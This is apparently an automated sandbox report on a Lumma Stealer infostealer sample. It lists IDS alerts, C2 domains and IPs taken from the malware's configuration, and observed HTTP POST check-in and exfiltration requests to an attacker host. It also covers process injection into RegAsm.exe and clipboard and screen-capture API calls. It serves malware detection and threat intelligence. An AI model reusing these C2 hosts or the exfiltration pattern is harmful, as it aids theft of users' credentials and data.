Source: Network traffic	Suricata IDS: 2058298 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (muggudrowiwm .shop in TLS SNI) : 192.168.2.7:49700 -> 104.131.68.180:443
Source: Network traffic	Suricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 104.131.68.180:443 -> 192.168.2.7:49700
Source: Network traffic	Suricata IDS: 2055475 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop) : 192.168.2.7:56654 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49704 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 104.131.68.180:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 104.131.68.180:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49716 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49702 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49747 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49704 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49701 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49702 -> 104.21.66.86:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: traineiwnqo.shop
Source: Malware configuration extractor	URLs: stagedchheiqwo.shop
Source: Malware configuration extractor	URLs: locatedblsoqp.shop
Source: Malware configuration extractor	URLs: caffegclasiqwp.shop
Source: Malware configuration extractor	URLs: evoliutwoqm.shop
Source: Malware configuration extractor	URLs: millyscroqwp.shop
Source: Malware configuration extractor	URLs: muggudrowiwm.shop
Source: Malware configuration extractor	URLs: stamppreewntnq.shop
Source: Malware configuration extractor	URLs: condedqpwqm.shop

Source: Joe Sandbox View	IP Address: 23.55.153.106 23.55.153.106
Source: Joe Sandbox View	IP Address: 104.131.68.180 104.131.68.180

Source: Joe Sandbox View

ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49730 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49747 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49710 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49704 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49716 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 104.131.68.180:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49723 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49742 -> 104.21.66.86:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: muggudrowiwm.shop
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12851Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15083Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20408Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1229Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 583247Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: lev-tolstoi.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: muggudrowiwm.shop
Source: global traffic	DNS traffic detected: DNS query: locatedblsoqp.shop
Source: global traffic	DNS traffic detected: DNS query: traineiwnqo.shop
Source: global traffic	DNS traffic detected: DNS query: condedqpwqm.shop
Source: global traffic	DNS traffic detected: DNS query: evoliutwoqm.shop
Source: global traffic	DNS traffic detected: DNS query: millyscroqwp.shop
Source: global traffic	DNS traffic detected: DNS query: stagedchheiqwo.shop
Source: global traffic	DNS traffic detected: DNS query: stamppreewntnq.shop
Source: global traffic	DNS traffic detected: DNS query: caffegclasiqwp.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: lev-tolstoi.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: muggudrowiwm.shop

Source: Amcache.hve.14.dr	String found in binary or memory: http://upx.sf.net
Source: RegAsm.exe, 00000008.00000002.1904233183.000000000108E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.1904883004.0000000003460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/
Source: RegAsm.exe, 00000008.00000002.1904904282.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api
Source: RegAsm.exe, 00000008.00000002.1903985717.0000000001006000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apiX
Source: RegAsm.exe, 00000008.00000002.1904233183.000000000108E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/pi

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 104.131.68.180:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49747 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_00432460 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

8_2_00432460

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_00432460 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

8_2_00432460

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_00424D53 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

8_2_00424D53

System Summary

.NET source code contains very large array initializations

Source: 5_6253708004881862888.exe, MoveAngles.cs

Large array initialization: MoveAngles: array initializer size 310272

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041F860	8_2_0041F860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00437160	8_2_00437160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041A1CA	8_2_0041A1CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040B9F0	8_2_0040B9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00426AA0	8_2_00426AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041434A	8_2_0041434A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043FBA0	8_2_0043FBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040EC7D	8_2_0040EC7D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040AC10	8_2_0040AC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041F420	8_2_0041F420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043DC30	8_2_0043DC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00429C3F	8_2_00429C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041C560	8_2_0041C560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043D6A2	8_2_0043D6A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00413F33	8_2_00413F33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041D042	8_2_0041D042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00401000	8_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042A020	8_2_0042A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043E8C2	8_2_0043E8C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00405880	8_2_00405880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041D0A0	8_2_0041D0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043E950	8_2_0043E950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00440160	8_2_00440160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042D911	8_2_0042D911
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00414930	8_2_00414930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042C9C6	8_2_0042C9C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004029D0	8_2_004029D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004121A8	8_2_004121A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042527C	8_2_0042527C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041BAC3	8_2_0041BAC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042FAD0	8_2_0042FAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00410AED	8_2_00410AED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00406280	8_2_00406280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043E2BF	8_2_0043E2BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00434B00	8_2_00434B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00433B0B	8_2_00433B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00411E0E	8_2_00411E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00426AA0	8_2_00426AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00418BBF	8_2_00418BBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042A451	8_2_0042A451
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00420458	8_2_00420458
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00432460	8_2_00432460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00436460	8_2_00436460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043EC60	8_2_0043EC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00408C00	8_2_00408C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042DC2A	8_2_0042DC2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042D483	8_2_0042D483
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042548A	8_2_0042548A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041EC8C	8_2_0041EC8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00404490	8_2_00404490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042B4A1	8_2_0042B4A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00427554	8_2_00427554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040D570	8_2_0040D570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043BDC0	8_2_0043BDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00431DE3	8_2_00431DE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00430654	8_2_00430654
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00418666	8_2_00418666
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00411E0E	8_2_00411E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00421E0D	8_2_00421E0D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00407620	8_2_00407620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043162B	8_2_0043162B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00411E30	8_2_00411E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042EE34	8_2_0042EE34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004366C0	8_2_004366C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00404EE0	8_2_00404EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043FE90	8_2_0043FE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00430EA1	8_2_00430EA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00402709	8_2_00402709
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042CF2A	8_2_0042CF2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00402733	8_2_00402733
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004217C0	8_2_004217C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00406F80	8_2_00406F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004127AA	8_2_004127AA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00419BA0 appears 133 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00409630 appears 51 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 1852

Source: 5_6253708004881862888.exe, 00000004.00000002.1273017065.000000000114E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 5_6253708004881862888.exe
Source: 5_6253708004881862888.exe	Binary or memory string: OriginalFilenamesecinitj% vs 5_6253708004881862888.exe

Source: 5_6253708004881862888.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 5_6253708004881862888.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/6@12/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_00437570 CoCreateInstance,

8_2_00437570

Source: C:\Users\user\Desktop\5_6253708004881862888.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\5_6253708004881862888.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5940:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1412

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\526abaa0-96fd-4ea8-8f50-811cea33ab9e

Jump to behavior

Source: 5_6253708004881862888.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 5_6253708004881862888.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\5_6253708004881862888.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 5_6253708004881862888.exe	Virustotal: Detection: 78%
Source: 5_6253708004881862888.exe	ReversingLabs: Detection: 76%

Source: unknown	Process created: C:\Users\user\Desktop\5_6253708004881862888.exe "C:\Users\user\Desktop\5_6253708004881862888.exe"
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 1852
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
